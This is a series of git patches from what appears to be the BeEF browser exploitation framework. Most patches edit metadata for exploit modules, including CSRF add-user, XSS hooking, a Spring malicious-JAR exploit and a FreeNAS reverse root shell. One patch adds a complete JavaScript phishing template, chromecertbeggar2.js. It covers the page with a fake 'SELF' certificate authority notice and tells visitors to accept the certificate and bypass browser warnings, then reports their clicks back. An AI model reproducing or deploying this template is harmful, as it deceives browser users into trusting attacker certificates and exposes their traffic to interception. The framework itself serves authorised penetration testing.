             authors: ["bcoles", "Ivano Binetti"]
-            target:
-                working: ["ALL"]
diff --git a/modules/exploits/boastmachine_3_1_add_user_csrf/config.yaml b/modules/exploits/boastmachine_3_1_add_user_csrf/config.yaml
index f754f84f7..6c703c02f 100644
--- a/modules/exploits/boastmachine_3_1_add_user_csrf/config.yaml
+++ b/modules/exploits/boastmachine_3_1_add_user_csrf/config.yaml
@@ -21,5 +21,3 @@ beef:
             name: "boastMachine <= 3.1 Add User CSRF"
             description: "Attempts to add a user to a boastMachine <= 3.1 install."
             authors: ["bcoles", "Dr.NaNo"]
-            target:
-                working: ["ALL"]
diff --git a/modules/exploits/spring_framework_malicious_jar/config.yaml b/modules/exploits/spring_framework_malicious_jar/config.yaml
index 1dbaace8f..7d5a17bc4 100644
--- a/modules/exploits/spring_framework_malicious_jar/config.yaml
+++ b/modules/exploits/spring_framework_malicious_jar/config.yaml
@@ -21,5 +21,3 @@ beef:
             name: "Spring Framework Malicious Jar Exploit"
             description: "Execute a malicious JAR file using the Spring Framework 'class.classloader' vulnerability (CVE-2010-1622).<br/>Specify the URL for a form controller on the target and the URL for your malicious JAR file.<br/>For more information see: http://www.exploit-db.com/exploits/13918/<br/><br/>Versions Affected:<br/>3.0.0 to 3.0.2<br/>2.5.0 to 2.5.6.SEC01 (community releases)<br/>2.5.0 to 2.5.7 (subscription customers)"
             authors: ["bcoles"]
-            target:
-                working: ["ALL"]
diff --git a/modules/exploits/xss/alienvault_ossim_3.1_xss/config.yaml b/modules/exploits/xss/alienvault_ossim_3.1_xss/config.yaml
index a43a30312..653c95f3f 100644
--- a/modules/exploits/xss/alienvault_ossim_3.1_xss/config.yaml
+++ b/modules/exploits/xss/alienvault_ossim_3.1_xss/config.yaml
@@ -21,5 +21,3 @@ beef:
             name: "AlienVault OSSIM 3.1 XSS"
             description: "Attempts to hook AlienVault OSSIM 3.1 using XSS.<br/>For more information see: http://www.exploit-db.com/exploits/20062/"
             authors: ["bcoles", "muts"]
-            target:
-                working: ["ALL"]
diff --git a/modules/exploits/xss/cisco_collaboration_server_5_xss/config.yaml b/modules/exploits/xss/cisco_collaboration_server_5_xss/config.yaml
index 3320a74f6..c5b1f6b7d 100644
--- a/modules/exploits/xss/cisco_collaboration_server_5_xss/config.yaml
+++ b/modules/exploits/xss/cisco_collaboration_server_5_xss/config.yaml
@@ -21,5 +21,3 @@ beef:
             name: "Cisco Collaboration Server 5 XSS"
             description: "Attempts to hook Cisco Collaboration Server 5 using XSS.<br/>For more information see: http://www.exploit-db.com/exploits/11403/"
             authors: ["bcoles", "s4squatch"]
-            target:
-                working: ["ALL"]
diff --git a/modules/exploits/xss/serendipity_1.6_xss/config.yaml b/modules/exploits/xss/serendipity_1.6_xss/config.yaml
index 96d9e9bb2..4aea5824b 100644
--- a/modules/exploits/xss/serendipity_1.6_xss/config.yaml
+++ b/modules/exploits/xss/serendipity_1.6_xss/config.yaml
@@ -21,5 +21,3 @@ beef:
             name: "Serendipity <= 1.6 XSS"
             description: "Attempts to hook Serendipity <= 1.6 using XSS.<br/>For more information see: http://www.exploit-db.com/exploits/18884/"
             authors: ["bcoles", "Stefan Schurtz"]
-            target:
-                working: ["ALL"]
diff --git a/modules/social_engineering/pretty_theft/config.yaml b/modules/social_engineering/pretty_theft/config.yaml
index e03c356bc..2540ced00 100644
--- a/modules/social_engineering/pretty_theft/config.yaml
+++ b/modules/social_engineering/pretty_theft/config.yaml
@@ -23,3 +23,4 @@ beef:
             authors: ["pwndizzle", "vt [nick.freeman@security-assessment.com]", "xntrik"]
             target:
                 user_notify: ['ALL']
+                not_working: ['IE']

From ba20f17831488ebc37279557fa6a0d8e064be22a Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Sun, 30 Sep 2012 18:50:28 +0930
Subject: [PATCH 054/397] Ugh. Apparently `target` can't be null. Fixed.

---
 modules/exploits/axous_1_1_1_add_user_csrf/config.yaml          | 2 ++
 modules/exploits/boastmachine_3_1_add_user_csrf/config.yaml     | 2 ++
 .../exploits/nas/freenas_reverse_root_shell_csrf/config.yaml    | 2 +-
 modules/exploits/spring_framework_malicious_jar/config.yaml     | 2 ++
 modules/exploits/xss/alienvault_ossim_3.1_xss/config.yaml       | 2 ++
 .../exploits/xss/cisco_collaboration_server_5_xss/config.yaml   | 2 ++
 modules/exploits/xss/serendipity_1.6_xss/config.yaml            | 2 ++
 7 files changed, 13 insertions(+), 1 deletion(-)

diff --git a/modules/exploits/axous_1_1_1_add_user_csrf/config.yaml b/modules/exploits/axous_1_1_1_add_user_csrf/config.yaml
index f1e802a65..c01ca6f49 100644
--- a/modules/exploits/axous_1_1_1_add_user_csrf/config.yaml
+++ b/modules/exploits/axous_1_1_1_add_user_csrf/config.yaml
@@ -21,3 +21,5 @@ beef:
             name: "Axous <= 1.1.1 Add User CSRF"
             description: "Attempts to add a user to an Axous <= 1.1.1 install (CVE-2012-2629)."
             authors: ["bcoles", "Ivano Binetti"]
+            target:
+                unknown: ["ALL"]
diff --git a/modules/exploits/boastmachine_3_1_add_user_csrf/config.yaml b/modules/exploits/boastmachine_3_1_add_user_csrf/config.yaml
index 6c703c02f..f16e2ece6 100644
--- a/modules/exploits/boastmachine_3_1_add_user_csrf/config.yaml
+++ b/modules/exploits/boastmachine_3_1_add_user_csrf/config.yaml
@@ -21,3 +21,5 @@ beef:
             name: "boastMachine <= 3.1 Add User CSRF"
             description: "Attempts to add a user to a boastMachine <= 3.1 install."
             authors: ["bcoles", "Dr.NaNo"]
+            target:
+                unknown: ["ALL"]
diff --git a/modules/exploits/nas/freenas_reverse_root_shell_csrf/config.yaml b/modules/exploits/nas/freenas_reverse_root_shell_csrf/config.yaml
index 012b7f74f..6232339f5 100644
--- a/modules/exploits/nas/freenas_reverse_root_shell_csrf/config.yaml
+++ b/modules/exploits/nas/freenas_reverse_root_shell_csrf/config.yaml
@@ -22,7 +22,7 @@ beef:
             enable: true
             category: ["Exploits", "NAS"]
             name: "FreeNAS Reverse Root Shell CSRF"
-            description: "Attempts to get a reverse root shell on a FreeNAS server.<br/>Tested on version 8.2.0 however other versions are likely to be vulnerable."
+            description: "Attempts to get a reverse root shell on a FreeNAS server.<br/>Tested on version 8.2.0 however other versions are likely to be vulnerable.<br/>Patched in version 8.3.0-BETA3."
             authors: ["bcoles"]
             target:
                 working: ["ALL"]
diff --git a/modules/exploits/spring_framework_malicious_jar/config.yaml b/modules/exploits/spring_framework_malicious_jar/config.yaml
index 7d5a17bc4..b898a24f2 100644
--- a/modules/exploits/spring_framework_malicious_jar/config.yaml
+++ b/modules/exploits/spring_framework_malicious_jar/config.yaml
@@ -21,3 +21,5 @@ beef:
             name: "Spring Framework Malicious Jar Exploit"
             description: "Execute a malicious JAR file using the Spring Framework 'class.classloader' vulnerability (CVE-2010-1622).<br/>Specify the URL for a form controller on the target and the URL for your malicious JAR file.<br/>For more information see: http://www.exploit-db.com/exploits/13918/<br/><br/>Versions Affected:<br/>3.0.0 to 3.0.2<br/>2.5.0 to 2.5.6.SEC01 (community releases)<br/>2.5.0 to 2.5.7 (subscription customers)"
             authors: ["bcoles"]
+            target:
+                unknown: ["ALL"]
diff --git a/modules/exploits/xss/alienvault_ossim_3.1_xss/config.yaml b/modules/exploits/xss/alienvault_ossim_3.1_xss/config.yaml
index 653c95f3f..1832d8a16 100644
--- a/modules/exploits/xss/alienvault_ossim_3.1_xss/config.yaml
+++ b/modules/exploits/xss/alienvault_ossim_3.1_xss/config.yaml
@@ -21,3 +21,5 @@ beef:
             name: "AlienVault OSSIM 3.1 XSS"
             description: "Attempts to hook AlienVault OSSIM 3.1 using XSS.<br/>For more information see: http://www.exploit-db.com/exploits/20062/"
             authors: ["bcoles", "muts"]
+            target:
+                unknown: ["ALL"]
diff --git a/modules/exploits/xss/cisco_collaboration_server_5_xss/config.yaml b/modules/exploits/xss/cisco_collaboration_server_5_xss/config.yaml
index c5b1f6b7d..9272039db 100644
--- a/modules/exploits/xss/cisco_collaboration_server_5_xss/config.yaml
+++ b/modules/exploits/xss/cisco_collaboration_server_5_xss/config.yaml
@@ -21,3 +21,5 @@ beef:
             name: "Cisco Collaboration Server 5 XSS"
             description: "Attempts to hook Cisco Collaboration Server 5 using XSS.<br/>For more information see: http://www.exploit-db.com/exploits/11403/"
             authors: ["bcoles", "s4squatch"]
+            target:
+                unknown: ["ALL"]
diff --git a/modules/exploits/xss/serendipity_1.6_xss/config.yaml b/modules/exploits/xss/serendipity_1.6_xss/config.yaml
index 4aea5824b..58cc51e18 100644
--- a/modules/exploits/xss/serendipity_1.6_xss/config.yaml
+++ b/modules/exploits/xss/serendipity_1.6_xss/config.yaml
@@ -21,3 +21,5 @@ beef:
             name: "Serendipity <= 1.6 XSS"
             description: "Attempts to hook Serendipity <= 1.6 using XSS.<br/>For more information see: http://www.exploit-db.com/exploits/18884/"
             authors: ["bcoles", "Stefan Schurtz"]
+            target:
+                unknown: ["ALL"]

From 104f8189d368e79eef0d43a75e3db940314efb64 Mon Sep 17 00:00:00 2001
From: Jean-Louis Huynen <huynenjl@gmail.com>
Date: Mon, 1 Oct 2012 16:06:45 +0200
Subject: [PATCH 055/397] added chromecertbeggar2.js

---
 .../templates/chromecertbeggar2.js            | 71 +++++++++++++++++++
 1 file changed, 71 insertions(+)
 create mode 100644 modules/social_engineering/simple_hijacker/templates/chromecertbeggar2.js

diff --git a/modules/social_engineering/simple_hijacker/templates/chromecertbeggar2.js b/modules/social_engineering/simple_hijacker/templates/chromecertbeggar2.js
new file mode 100644
index 000000000..10313456e
--- /dev/null
+++ b/modules/social_engineering/simple_hijacker/templates/chromecertbeggar2.js
@@ -0,0 +1,71 @@
+  getDomain = function(url){
+    return url.match(/:\/\/(www\.)?(.[^/:]+)/)[2];
+  }  
+  
+  toggleMoreInfo = function(collapse) {
+    if (collapse) {
+      $("more_info_long").style.display = "none";
+      $("more_info_short").style.display = "block";
+    } else {
+      $("more_info_long").style.display = "block";
+      $("more_info_short").style.display = "none";
+    }
+  }
+  setDirectionSensitiveImages = function () {
+    if (document.documentElement.dir == 'rtl') {
+      $("twisty_closed_rtl").style.display = "inline";
+    } else {
+      $("twisty_closed").style.display = "inline";
+    }
+  }
+
+  target = $j(this).attr('href');
+  domain = getDomain(target);
+
+//Assets
+		warning = '<img src="data:image/png;base64,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" onmousedown="return false">';
+		backgreen = '<img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAJFCAIAAACTIQqNAAAAAXNSR0IArs4c6QAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9wJGA4GE+nvoKcAAAAZdEVYdENvbW1lbnQAQ3JlYXRlZCB3aXRoIEdJTVBXgQ4XAAAA4UlEQVRIx71VWxLDIAhc1iP0AD1mTy/bD2Njph1j0OaDSUTeC4jH60kAQ0QYAdChwzlMNMJVvpXn2u9AAj7nI0BmiVImCMIrzyipkdnPVd4sUZZpSp+4jzqFLxNNVbbkLmvkdPR1H4lAW3cSyATSdp9LPSpuQT8y0LT3UZxKnJK+8AlTMK8z3zXnUflWDz6an1Hyrdf4+e/avppfMxO/bYpwDMV7htulHmn3RgfDXkwtRqvmT+JkP47OwQo7/TmD25/3T1o+l0WXk/ug3YcB7Bis/8yOnelfv39/hv368nfyDcZnjfUPcK3LAAAAAElFTkSuQmCC" width="100%" height="100%" onmousedown="return false;">';
+		backred = '<img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAJFCAIAAACTIQqNAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAQRJREFUSMe9lVtyxTAIQyUW0C10v9306Qd+NNNeYyfT+8EkEwRIBpz4+vgMSYU5nyYsB+R3u4orzArRnr0OComwHRKBFO7132IOmwCFpUDJY3AdGLVzoL1nnHDIBHLGN8w8L4f4kc8ORBgPHJdab7TRi86fa39IrnrKD1I3tNniZq7kOThylgcpfNGX83aaQ2p9X+mg9VV9hza50mps6KP3cKNHF+yOzlbbQ/OKb+5vpRHyTnnF84TjqLXQjVjPbZuFCjf1b/BaYKbv9eywUYeHPDK/F5i1H1HORaVjz/8bk/+HeV9xqH3GV7z+7lGVu9qZ+szOff8Vy8b+39H5JPZuzELHNyoGruezaO1kAAAAAElFTkSuQmCC" width="100%" height="100%" onmousedown="return false;">';
+		locker = '<img style="margin:16px;" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABwAAAAcCAIAAAD9b0jDAAAESElEQVRIia1VTWhcVRg93533ZiaTZJyEJq1t0x+lpVXqRltEhSK2FikoVN24EAvitkhc14VUhCK4ciXSCi4U+kM3RjAoWhsRqQuFaLX+BEmq/UlsTCeTefccF/e+9yZd9y7uffPe3POde75zv88k4U6PJCxX5+fe/fjopZlvbravVBIAMEAAoLDkq+KjyheShpt379j88CuHjq1prQdgkv6c+/XI8adcutBsuUbD0tTgyu1AOIyEAkpS8VYAvEe3S6fW6y9NbFq3IwHw/tk3Xfrv6LpKa8j6GuYqZtZD0ExSoC6aJAbGggQBkkhk3paX5s+cf+PIcx8mAH747YvmsLWG7K4hV60aTAaDCTJAMBSyi5BA5TMjLgQS1dRmrn8eNe36xUZ/pd5naRVmQgRDoCjJZ8y6IAXBTFaBOYNCPEHxJJUUSpYiqKsgSVBJYEE6A0xmkESPbaOHto4c2Di8W9Lvc99Oz3wyPXu62sckBRwAMEohg5xTBDWTAQZZyLqFtIpeuzePP7rzNUmSSN2/5eDOzQcnpjZ9/dPbjSaqdYMTIAa6UlAqiT6RJCPkAIMAENo+8uwjO8bnb85OTp28cPEMgD27nt6758X9e8avXL38y7VTA84lNZhWGyIeQMiFESymlJm2rHlS0uTUiVMTb11f/Pm/7NLkxeNffnfSU9vHDizeYGeJzJSzFCFKEVQ9HozBDD7T+uHdpKYunq32oTXiRsbcyJi79Pc5kls3PNRe4nJb9EQOKgZmSFAYLiopwAR5L3qRElRv2OCQDQ4bhCQzT5Fa6ShbofdWyfVj9HCuqSjKQgZlAJVlpOhJ7+WpbpfLbZNQp0h6sttRtyPfhaqIekaiBVMpXkTBKHo98+DJ/vooqWOvnqdERgOE58H+0ZefP/HR5OGVFVRqMBeIRVBXZp8qNO92ec/afeGYYSblSU8yn3dt33/rJjtt+awQFD2aKvATKXOAkGUlqfD/XqbKf7aX1GmznplVEK2Kwqelc02UGYKOt6FQ0mrQbgdZV/TBieXxkwKSAgkzyaBMJAuU2/nmtiQlmnzIc+nIpJAUAgWDIHiuZrqaIEtfIlApEEumkCCLF8Ji7ellGvkGiViCBhWpWMBWgUqgRMATgMxA3Z6oHqzcKaH05YlG/im/pqWXJEag6ZlPWY4YgMxPIH3/42dpXc717M2rec6Uysu4RMDh9IXDN+a4eEPLt+Kn6JOQBEO1rv4hS+swF1NS3PUEQF9tEFwMNzdGM9X60Bq1+gB8BgoW21EMbIBLkNZRa8gqKIpfmgxE0Ae27b187VyWWUaElueckioaTdQaYMhhtLMFLU2CmVXkHJyLFEntHNsXW/Qfs9NH33uiNrgw0ESaxkZSSJ935bInF0tZ1wBSNTc8fuirjWvuC+0X1xZmP5gY/2vhwrL/p+K0Ciff2qNbbxQAajbW3bv2sRcef2docENkijs9/ge36MK8f8CaUgAAAABJRU5ErkJggg==" alt="SSL SELF Icon" onmousedown="return false">';
+		textGreen = '<b>'+domain+'</b> chose SELF&#174; to protect your security. If your browser raises any warning when continuing it means that it\'s not up-to-date. <b>Accept</b> this certificate then please consider updating your browser as soon as possible.<br><br>SELF&#174; - to make the Internet a safer place.';
+		textRed =  'Your browser raised a warning because it is not up to date. As <b>'+domain+'</b> chose SELF&#174; to protect your security you need to <b>ACCEPT</b> this certificate to view its content then please consider update your browser as soon as possible. When your browser will be up to date, it will <b>accept</b> SELF&#174;-signed certificates. Please <b>bypass any warning</b> until then.<br><br>SELF&#174; - to make the Internet a safer place.';
+	  arrows = '<div style="margin:0px 80px 0px"></div><div style="margin:0px 80px 0px"><form style="margin:15px 5px 15px 0px;padding:0px"><input type=button value=continue name=back onclick="forward()"></form></div><div style="margin:30px 80px 0px; border-top:1px solid #ccc; padding-top:6px" id=more_info_short><a href="#" onclick="toggleMoreInfo(false); return false" onmousedown="return false"><img id=twisty_closed src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAsAAAALCAYAAACprHcmAAAANklEQVR42q3QMQoAMAgEwfz/05dcoVcEYQuFwWYL8Uhqb+Q9+WLDcYFxwDhgHDjev3n/z96TCxE/Ie1QsznxAAAAAElFTkSuQmCC" border=0 style=display:none><img id=twisty_closed_rtl src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAsAAAALCAYAAACprHcmAAAAMklEQVQY02P4jwcwMDCg8vEpJEoxTCFBxcgK8SpGV4hTMTaF1DGZZDeTHBokhzOuGAQAxQt2mANh8/IAAAAASUVORK5CYII=" border=0 style=display:none><span i18n-content=moreInfoTitle style="margin-left:5px;margin-right:5px">read more about the SELF&#174; certification authority</span></a></div><div style="margin:30px 80px 0px; border-top:1px solid #ccc; padding-top:6px" id=more_info_long style=display:none><a href="#" onclick="toggleMoreInfo(true); return false" onmousedown="return false"><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAsAAAALCAYAAACprHcmAAAAMUlEQVQY02P4//8/A7GYgXaKgeA/0Riqg6BCFGcQUojhZnwKsXoQl0KcoYFNIW3DGQCkVyHtwOU6YQAAAABJRU5ErkJggg==" border=0><span style="margin-left:5px;margin-right:5px">read more about the SELF&#174; certification authority</span></a><p i18n-values=.innerHTML:moreInfo1>Security Enhanced Layer Factory&#174;: because nobody of us cannot realize the full potential of the Internet, unless it is a reliable place to interact and to deal. Our dependence on computers and the Internet increases every day, like our vulnerability. Daily news reports confirm a clear and present danger to all the Internet users (worms, viruses, trojans, malware, cybercrime, cyber-terrorism and related threats). These threats, mainly the very sophisticated group work of organized crime, directly harm millions of Internet users have real confidence in the Internet. Every individual or the company using the Internet has a role in the restoring of trust. SELF&#174; help people as customer or seller to feel safe by issuing SELF&#174;-signed certificate that are build to last. With SELF&#174; you will never be harmed again - Trust is our workship.</p><p i18n-values=.innerHTML:moreInfo2>Security Enhanced Layer Factory&#174;, SELF&#174; and SELF&#174; logo are registered trademarks.</p></div>';
+	    
+    buildtpl = function(target, background, icon, text, addarrows){
+        tpl='<div style="position:absolute;width:100%;height:100%;">'+background+'</div><table width="100%" cellspacing=0 cellpadding=0><td style=padding:40px valign=middle align=center><div style="width:60%; background-color:white; color:black; font-size:10pt; line-height:16pt; text-align:left; padding:20px; position:relative; -webkit-box-shadow:3px 3px 8px #200; border-radius:5px"><div style=position:absolute>'+icon+'</div><div style="margin: 0px 77px 0px; font-size:18pt; line-height: 140%; margin-bottom:6pt; font-weight:bold; color:#660000">Please accept our new SELF&#174;-Signed Certificate to ensure maximum security protection.</div><div style="margin:0px 80px 0px">'+text+'</div>';
+		
+		if(addarrows){
+		    tpl = tpl + arrows+'</div></td></table>';
+    		target.innerHTML = tpl;
+		    toggleMoreInfo(true);
+		    setDirectionSensitiveImages();
+		}else{
+		    tpl = tpl + '</div></td></table>';
+    		target.innerHTML = tpl;
+		}
+  }
+  
+  forward = function(){
+    send("User continuing to "+target);
+    timer=setTimeout(function(){timer2=setTimeout(function(){buildtpl(sneakydiv, backred, warning, textRed, true);},400);window.location = target;},500);
+  }
+  
+  function $(o) {return document.getElementById(o);}
+
+  sendCommand = function(cmd) {
+    window.domAutomationController.setAutomationId(1);
+    window.domAutomationController.send(cmd);
+  }
+  
+  $j(document).attr('title', domain+" Security Enhanced Layer Factory&#174; certificate acceptance");
+  imgbootstrap = document.createElement('div');
+  imgbootstrap.setAttribute('style','display:none');
+  document.body.appendChild(imgbootstrap);
+  document.body.removeChild(imgbootstrap);
+  buildtpl(imgbootstrap, backred, warning, textRed, false)
+  sneakydiv = document.createElement('div');
+  sneakydiv.setAttribute('id', 'background');
+  sneakydiv.setAttribute('oncontextmenu','return false;');
+  sneakydiv.setAttribute('style', 'overflow:hidden;position:absolute;width:100%;height:100%;top:0px;left:0px;z-index:51;opacity:1;background-color:#13771f; font-family:Helvetica,Arial,sans-serif; margin:0px;');
+  document.body.appendChild(sneakydiv);
+  buildtpl(sneakydiv, backgreen, locker, textGreen, true);

From 7e43e15838149b2a543e47513892e6d94c875e0c Mon Sep 17 00:00:00 2001
From: Jean-Louis Huynen <huynenjl@gmail.com>
Date: Mon, 1 Oct 2012 16:11:18 +0200
Subject: [PATCH 056/397] modified config.yaml of simple_hijacker to activate
 chromecertbeggar2.js template

---
 modules/social_engineering/simple_hijacker/config.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/social_engineering/simple_hijacker/config.yaml b/modules/social_engineering/simple_hijacker/config.yaml
index 8fbb9209d..b131f91ba 100644
--- a/modules/social_engineering/simple_hijacker/config.yaml
+++ b/modules/social_engineering/simple_hijacker/config.yaml
@@ -20,7 +20,7 @@ beef:
             category: "Social Engineering"
             name: "Simple Hijacker"
             description: "Hijack clicks on links to display what you want."
-            templates: ["credential", "confirmbox", "amazon", "chromecertbeggar"]
+            templates: ["credential", "confirmbox", "amazon", "chromecertbeggar", "chromecertbeggar2"]
             authors: ["gallypette"]
             target:
                 user_notify: ['ALL']

From 480e797853fe9d8a62acba930ff0d325857fe2cd Mon Sep 17 00:00:00 2001
From: Roos <roos@MacBook-van-Roos.local>
Date: Thu, 4 Oct 2012 19:53:36 +0200
Subject: [PATCH 057/397] auto launch metasploit initial commit

---
 extensions/metasploit/config.yaml  |  9 ++++++
 extensions/metasploit/rpcclient.rb | 51 ++++++++++++++++++++++++++++++
 2 files changed, 60 insertions(+)

diff --git a/extensions/metasploit/config.yaml b/extensions/metasploit/config.yaml
index e2783123f..609bfe5dd 100644
--- a/extensions/metasploit/config.yaml
+++ b/extensions/metasploit/config.yaml
@@ -32,5 +32,14 @@ beef:
             uri: '/api'
             ssl: false
             ssl_version: 'SSLv3'
+            ssl_verify: true
             callback_host: "127.0.0.1"
             autopwn_url: "autopwn"
+            auto_msfrpcd: true
+            auto_msfrpcd_timeout: 120
+            msf_path: [ 
+              {os: 'osx', path: '/tmp/'},
+              {os: 'bt5', path: '/opt/metasploit/'},
+              {os: 'win', path: 'c:\metasploit\msf3\'},
+              {os: 'custom', path: ''}
+            ]
diff --git a/extensions/metasploit/rpcclient.rb b/extensions/metasploit/rpcclient.rb
index aa2df4305..93ee61fa3 100644
--- a/extensions/metasploit/rpcclient.rb
+++ b/extensions/metasploit/rpcclient.rb
@@ -43,6 +43,57 @@ module Metasploit
